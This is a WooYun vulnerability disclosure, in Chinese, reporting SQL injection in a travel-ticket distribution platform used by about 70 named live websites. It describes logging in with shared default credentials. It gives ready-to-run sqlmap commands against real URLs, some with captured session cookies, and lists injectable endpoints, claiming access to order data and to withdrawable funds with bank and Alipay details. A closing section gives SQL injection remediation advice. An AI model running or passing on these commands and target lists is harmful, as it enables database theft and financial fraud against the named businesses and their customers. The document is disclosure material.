当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153644

漏洞标题:神器而已之分销平台17处通用注入(大量订单信息泄漏/大量资金可提现/)

相关厂商:自我游

漏洞作者: 珈蓝夜宇

提交时间:2015-11-23 12:37

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

双11了,来一发吧.颤抖吧少年
神器为: http://zone.wooyun.org/content/21289

详细说明:

看到小伙伴一个漏洞 : WooYun: 驴妈妈旅游网某站SQL注入(DBA权限/20个库)
然后这个漏洞: WooYun: 大量旅游平台爆破(大量金额可提现/订单数据泄漏/大量成功案例)
查看一下这些平台的/m目录

3.png


4.png


都有这个手机登陆的页面,然后登陆,发现账号和密码是通用的.

5.png


发现是可以登陆的.
那么记下来祭出大杀器 大杀器呢 与猪猪侠的平台相似
详情请看 http://zone.wooyun.org/content/21289

11.png


22.png


44.png


55.png


自动生成sqlmap语句,直接放到sqlmap里执行

33.png


看结果

1.png


2.png


比如这种旅游平台的话,数据量是非常大的

6.png


还是很多旅游平台都在用
查看一些用户名密码
从这个链接可以知道这些都是可以 提现,有银行卡,或者支付宝信息
所以呢,来查看一下用户

88.png


然后贴几条sqlmap语句

sqlmap.py -u "http://b2b.tutulyw.cn/m/order_list.jsp?state=1"  --cookie="JSESSIONID=hDrY1zsRbgFf; dc4e01dbca1cd374ffb9068b31380fc2=2csFVZj9GauFmbsVTPmIHb0l2XklSPjZXd0N2XklTPzEDO5UyNpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZ10zNyECN1Z2cyV2Xh5Wb9UnbmR2Zv13cmgXafN3ZvJXd9ASMpZ1ck9XawNTPmEGZfJGbulzaz1WYzFDMmEmcs9VZp9DZy0nJzVXZfJWa9QGdzVCd=Y; a1a50777ae54df93c3348cef08dce3c3=1Zj9Xd0N2Xh5Wb9UY6UCY6UCp5Fer54i75R2OIIWuhUmOg5W+sPWCslDahlj7mm3amn/rgpn6lnjapgg75/qL6vemJiR2Xpxmb9s2chFzcxAmJfd3YzVFdp9DZ10zNyECN=Y; 87975ce5500b2471292c9d022b9ef2db=3YzVFdp9DZx0zM1gTOmcHb0l2XklSPjZXd0N3X5RGc9UiMnZ2X1N3cfRWa9QTNxcjMmQXdlNlcu9WYl1WP05mZtd3b4NmJzl2Xyd3bwVTPmEXafNGZzlDcx0mJiR2Xpxmb9s2chFzcxAnJzVXZfJWa9QGdzVCd=Y"  --headers="User-Agent:Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36"


sqlmap.py -u "http://zyx.nanhutravel.com/m/show_prod.jsp?info_id=7182782"  --cookie="userId=4a878956-4697-4b16-ad37-1d90bf0aad58; _adwp=264981001.9169217767.1445943339.1445943339.1445943339.1; _adwr=264981001%230; _jzqa=1.980636860382980100.1445943340.1445943340.1445943340.1; Hm_lvt_a70d0cb7260909a96db0be2a62a6601e=1445943340; Hm_lvt_ec5d6b67d05b546fc5637880f592e61f=1445943340; JSESSIONID=fm4tmDaDd7pb; a1a50777ae54df93c3348cef08dce3c3=1Zj9Xd0N2Xh5Wb9UI6qer54ip5TimJiR2Xpxmb9s2chFzcxMmJfd3YzVFdp9DZx0DOyUjMmU; 87975ce5500b2471292c9d022b9ef2db=3YzVFdp9DZx0DOyUjMmUHb0l2XklSPjZXd0N3X5RGc9UyMnZ2X1N3cfRWa9QTM1gjM1InJzVXZfJmbtFTZm3Ynk7LumAXafN3ZvJXd9ACMpZ1ck9XawNTPmEGZfJGbulzaz1WYzFzMmEXdlNlcp9DZs1WalZmbmc"  --headers="User-Agent:Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36"


sqlmap.py -u "http://zyx.nanhutravel.com/m/manager_prod_list.jsp?state=1"  --cookie="userId=4a878956-4697-4b16-ad37-1d90bf0aad58; _adwp=264981001.9169217767.1445943339.1445943339.1445943339.1; _adwr=264981001%230; _jzqa=1.980636860382980100.1445943340.1445943340.1445943340.1; Hm_lvt_a70d0cb7260909a96db0be2a62a6601e=1445943340; Hm_lvt_ec5d6b67d05b546fc5637880f592e61f=1445943340; JSESSIONID=fm4tmDaDd7pb; a1a50777ae54df93c3348cef08dce3c3=1Zj9Xd0N2Xh5Wb9UI6qer54ip5TimJiR2Xpxmb9s2chFzcxMmJfd3YzVFdp9DZx0DOyUjMmU; 87975ce5500b2471292c9d022b9ef2db=3YzVFdp9DZx0DOyUjMmUHb0l2XklSPjZXd0N3X5RGc9UyMnZ2X1N3cfRWa9QTM1gjM1InJzVXZfJmbtFTZm3Ynk7LumAXafN3ZvJXd9ACMpZ1ck9XawNTPmEGZfJGbulzaz1WYzFzMmEXdlNlcp9DZs1WalZmbmc"  --headers="User-Agent:Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36"


具体链接如下: 这里去除了cookie , 测试时加上cookie就能注入了

sqlmap.py -u "http://b2b.tutulyw.cn/m/order_list.jsp?state=1"  
sqlmap.py -u "http://b2b.tutulyw.cn/m/order_show.jsp?order_id=1"  
sqlmap.py -u "http://b2b.tutulyw.cn/m/2/list0.jsp?area_id=10034&order_cust_id=285818&user_id=123456"  
sqlmap.py -u "http://b2b.tutulyw.cn/m/order_show.jsp?order_id=4823"  
sqlmap.py -u "http://b2b.tutulyw.cn/system/usr_login_list.jsp" 
sqlmap.py -u "http://zyx.nanhutravel.com/m/show_prod.jsp?info_id=7182782" 
sqlmap.py -u "http://zyx.nanhutravel.com/m/manager_prod_list.jsp?state=0"  
sqlmap.py -u "http://zyx.nanhutravel.com/m/show_prod.jsp?info_id=7379364"  
sqlmap.py -u "http://zyx.nanhutravel.com/m/show_prod.jsp?info_id=7111158"  
sqlmap.py -u "http://zyx.nanhutravel.com/m/manager_order_list.jsp?state=0" 
sqlmap.py -u "http://zyx.nanhutravel.com/m/manager_prod_list.jsp?state=1"
sqlmap.py -u "http://zyx.nanhutravel.com/m/manager_order_list.jsp?action=list&state=&key=&limit=10"
sqlmap.py -u "http://zyx.nanhutravel.com/m/manager_order_list.jsp?action=list&state=&key=&limit=10"
sqlmap.py -u "http://zyx.nanhutravel.com/m/manager_change_list.jsp?action=list&state=&key=&limit=10"
sqlmap.py -u "http://zyx.nanhutravel.com/m/manager_order_list.jsp?action=list&state=&key=&limit=30"
sqlmap.py -u "http://zyx.nanhutravel.com/m/order_show.jsp?order_id=5242399"
sqlmap.py -u "http://zyx.nanhutravel.com/m/manager_order_list.jsp?action=list&state=&key=&limit=40"
sqlmap.py -u "http://zyx.nanhutravel.com/m/manager_change_list.jsp?action=list&state=&key=&limit=20"

漏洞证明:

受影响链接

http://b2b.tutulyw.cn 【途途旅游网 分销平台 全国景点门票 线路—分销平台】
http://zyx.nanhutravel.com 【自游易—分销平台】
http://b2b.52ziu.com 【千岛湖小地陪分销系统—分销平台】
http://u.liuliuka.com 【溜溜卡旅游分销系统—分销平台】
http://b2b.dong24.com 【动网分销系统—分销平台】
http://www.sopiaowang.cn 【搜票网一站式旅游分销系统—分销平台】
http://fx.tatalv.com 【乐游旅行网—分销平台】
http://fx.tuyly.com 【途游—分销平台】
http://b2b.029ly.cn 【新浪潮旅行网分销平台(西安门票分销平台)—分销平台】
http://www.piaododo.com 【票多多—分销平台】
http://b2b.glwangcheng.com 【桂林升辉旅游集团分销平台—分销平台】
http://www.jinzhaolvxing.com 【中山市今朝商务服务有限公司—分销平台】
http://b2b.sdly114.com 【山东旅游分销系统—分销平台】
http://b2b.csyssh.com 【常熟市虞山尚湖风景区—分销平台】
http://b2b.guantour.com 【井冈山管理局电子商务平台】
http://www.eshou.cc 【壹首旅游—分销平台】
http://b2b.qnwer.com 【魅力中华旅游分销平台—分销平台】
http://b2b.shanhaitian.net 【山海天旅行社产品平台—分销平台】
http://menpiao.eptxw.com 【E票天下—门票系统—分销平台】 
http://b2b.123kfj.com 【看风景自由行—分销平台】
http://www.fx.leda888.com 【阿凡提旅游网—分销平台】
http://www.molvtu.com 【海盗旅行—分销平台】
http://b.wankelai.cc 【万客来旅游分销系统—分销平台】
http://www.bjlypw.com 【幸运旅途票务—分销平台】
http://meitu.zowoyoo.com 【四川美途智慧旅游系统—分销平台】
http://fx.junyuets.net 【君悦自由行分销系统—分销平台】
http://b2b.lyly123.net 【烈扬门票系统—分销平台】
http://www.lvqi.com 【www.lvqi.com—分销平台】
http://b2b.iyouke.com 【爱游客旅游分销平台—分销平台】
http://www.zhccsw.com 【传程商务—分销平台】
http://www.yqtrip.net 【珠海百合旅行社有限公司香洲营业部—分销平台】
http://www.hzdjs.com 【倒计时旅游—分销平台】
http://www.gllyzy.com 【桂林民族国际旅行社—分销平台】
http://m.yebooking.com 【任意游—分销平台】
http://www.rzjcts.com 【锦程票务—分销平台】
http://fx.henghengw.net 【淘门票电子商务平台】
http://hnzsj.zowoyoo.com 【海南紫水晶商旅服务有限公司—分销平台】  
http://www.vecontravel.com 【慧光之旅—分销平台】                   
http://www.ihangcheng.com 【珠海航程—分销平台】                 
http://www.tourlm.com 【广州同行联盟分销系统—分销平台】           
http://you.17lehuo.cn 【爱尚旅游—分销平台】                          
http://b2b.citsgd.com.cn 【广东国旅分销系统—分销平台】  
http://b2b.haolvyou.cn 【好旅友旅游网—分销平台】  
http://www.5135u.com 【新加坡旅游集散中心—分销平台】  
http://b.fscts.com 【佛山中旅—分销平台】
http://fenxiao.lvmama.com 【驴妈妈分销平台—分销平台】
http://u.ddl365.com 【兜兜乐旅游分销系统—分销平台】
http://www.u3w4.net 【U3W4分销系统—分销平台】
http://www.songdu.cc 【黄山酒店、黄山门票、自驾游、黄山旅游同行—分销平台】
http://www.5xwsu.com 【杭州众安自由行分销系统—分销平台】
http://admin.tpyou.com 【欢乐游票务分销系统—分销平台】
http://b2b.qnwer.com 【魅力中华旅游分销平台—分销平台】
http://b2b.jzgjdjc.com 【蓟洲国际(官方)电子票务—分销平台】
http://b2b.shanhaitian.net 【山海天旅行社产品平台—分销平台】
http://menpiao.eptxw.com 【E票天下—门票系统—分销平台】 
http://www.autosalon.com.cn 【梦车厂—分销平台】
http://b2b.xsgpl.com 【杭州仙山谷漂流分销系统—分销平台】
http://www.xshmall.cn 【豪天旅游—分销平台】
http://www.jzd-zh.com 【珠海九洲岛网络营销中心—分销平台】
http://www.xcbooking.com 【河源市新程假期票务中心—分销平台】
http://www.zjlyfx.com 【金洲国际旅行社—分销平台】
http://b2b.hbrj99.com 【瑞捷国际旅行社—分销平台】
http://www.tfjq.com.cn 【团购预约专用通道-选择团购渠道】
http://u.aifangsi.com 【爱放肆旅游网—便捷旅游电商系统—分销平台】
http://b2b.zh-tfy.com 【珠海畅游国旅—分销平台】
http://www.wuhanchufa.com 【武汉出发—分销平台】
http://www.hubeimenpiao.com 【中南国旅—分销平台】
http://www.daidaiyoo.com 【呆游部落—分销平台】
http://www.yunlvtianxia.com 【云旅天下—分销平台】

修复方案:

使用参数检查的方式,拦截带有SQL语法的参数传入应用程序
使用预编译的处理方式处理拼接了用户参数的SQL语句
在参数即将进入数据库执行之前,对SQL语句的语义进行完整性检查,确认语义没有发生变化
在出现SQL注入漏洞时,要在出现问题的参数拼接进SQL语句前进行过滤或者校验,不要依赖程序最开始处防护代码
定期审计数据库执行日志,查看是否存在应用程序正常逻辑之外的SQL语句执行

版权声明:转载请注明来源 珈蓝夜宇@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:20 (WooYun评价)